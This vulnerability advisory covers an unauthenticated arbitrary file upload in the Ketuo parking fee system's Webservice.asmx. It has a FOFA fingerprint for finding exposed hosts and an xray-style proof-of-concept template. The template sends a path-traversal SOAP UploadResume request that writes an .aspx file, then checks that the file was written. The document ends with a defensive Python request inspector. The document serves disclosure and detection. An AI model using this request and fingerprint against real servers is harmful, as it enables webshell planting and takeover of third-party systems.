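Vulnerability Description
The Webservice.asmx interface of the Ketuo (科拓) fully intelligent parking fee system has an arbitrary file upload vulnerability. An unauthenticated attacker can use it to execute arbitrary code on the server, write a backdoor, and obtain server privileges, and from there take control of the entire web server.
FOFA: body="/KT_Css/qd_defaul.css"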
id: ketuo-webservice-asmx-fileupload
info:
  name: 科拓全智能停车收费系统任意文件上传漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    科拓全智能停车收费系统Webservice.asmx接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
    FOFA:body="/KT_Css/qd_defaul.css"
  reference:
    - https://blog.csdn.net/weixin_42207802/article/details/139002532
  tags: ketuo,科拓,fileupload
  created: 2025/03/05
set:
  hostname: request.url.host
  randstr_url: randomLowercase(8)
  randstr_content: randomLowercase(8)
  base64_content: base64(string(randstr_content))
rules:
  r0:
    request:
      method: POST
      path: /Webservice.asmx
      headers:
        Content-Type: text/xml; charset=utf-8
        SOAPAction: "http://tempuri.org/UploadResume"
      body: |
        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <UploadResume xmlns="http://tempuri.org/">
              <ip>1</ip>
              <fileName>../../../../{{randstr_url}}.aspx</fileName>
              <fileFlow>{{base64_content}}</fileFlow>
              <tag>3</tag>
            </UploadResume>
          </soap:Body>
        </soap:Envelope>
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{randstr_url}}.aspx
    expression: response.status == 200 && response.body.bcontains(bytes(randstr_content))
expression: r0() && r1()
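The check the template relies on being absent can be written as a request inspector for a reverse proxy or for review of captured request bodies. This is an added example, not code from the original page or from the vendor. The function names, the extension list and the sample envelope are assumptions constructed for illustration.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {
    "soap": "http://schemas.xmlsoap.org/soap/envelope/",
    "t": "http://tempuri.org/",
}
# Assumed list: extensions IIS/ASP.NET executes or treats as configuration.
EXECUTABLE_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".cshtml", ".config"}


def inspect_upload_resume(soap_body: bytes) -> list[str]:
    """Return the reasons an UploadResume request should be blocked or alerted on."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return ["unparseable SOAP body"]
    node = root.find("soap:Body/t:UploadResume/t:fileName", NS)
    if node is None:
        return []  # not an UploadResume call
    name = (node.text or "").strip()
    reasons = []
    # Treat both separators alike: Windows accepts "/" and "\" in paths.
    parts = name.replace("\\", "/").split("/")
    if ".." in parts:
        reasons.append("parent-directory segment in fileName")
    if len(parts) > 1 or ntpath.isabs(name) or ntpath.splitdrive(name)[0]:
        reasons.append("fileName is a path, not a bare file name")
    # Windows drops trailing dots and spaces, so normalise before reading the extension.
    ext = ntpath.splitext(name.rstrip(". ").lower())[1]
    if ext in EXECUTABLE_EXT:
        reasons.append(f"server-executable extension {ext}")
    return reasons


def _envelope(file_name: str) -> bytes:
    """Build a constructed UploadResume envelope for testing the inspector."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        '<soap:Body><UploadResume xmlns="http://tempuri.org/">'
        f"<ip>1</ip><fileName>{file_name}</fileName>"
        "<fileFlow>Y29uc3RydWN0ZWQ=</fileFlow><tag>3</tag>"
        "</UploadResume></soap:Body></soap:Envelope>"
    ).encode()
```

The same two rules (bare file name only, no server-executable extension) belong in the server-side handler itself; the inspector only covers requests that pass through the point where it is deployed.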